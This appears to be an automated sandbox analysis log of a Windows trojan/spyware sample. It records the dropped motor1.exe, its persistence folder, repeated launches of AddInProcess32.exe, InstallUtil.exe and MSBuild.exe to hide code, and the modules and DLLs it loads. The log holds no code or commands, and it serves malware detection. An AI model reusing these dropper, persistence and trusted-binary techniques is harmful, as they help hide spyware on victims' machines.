Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ll\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBpA
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@63/102@1/1
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD946A1060 SetLastError,FormatMessageW,GetLastError,SetLastError,FormatMessageW,GetLastError, 4_2_00007FFD946A1060
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Mutant created: \Sessions\1\BaseNamedObjects\IwMAIz6YYiXAdbpb
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3924
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5448
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f
Source: pKxhpP0spW.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: pKxhpP0spW.exe Virustotal: Detection: 9%
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\OS\win\OsUtils_win.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\OS\win\FakeWindow.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\FileCache.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\MoveToTrash.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\DirectoryWatcher.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\Junction.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\DirectoryWatcher.cpp
Source: motor1.exe String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi/Fnd/RAII/Releasable.h
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File read: C:\Users\user\Desktop\pKxhpP0spW.exe
Source: unknown Process created: C:\Users\user\Desktop\pKxhpP0spW.exe "C:\Users\user\Desktop\pKxhpP0spW.exe"
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 76
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 76
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: glog.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: boost_filesystem-mt-x64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: webuid.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndcrashhandler.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndnetworking.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndstring.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndcrashhandler.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndnetworking.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndstring.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndapplocations.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndfilesystem.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndos.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndstring.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndexception.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndtime.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: cpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndhash.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndpointer.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndexception.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: fndversion.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
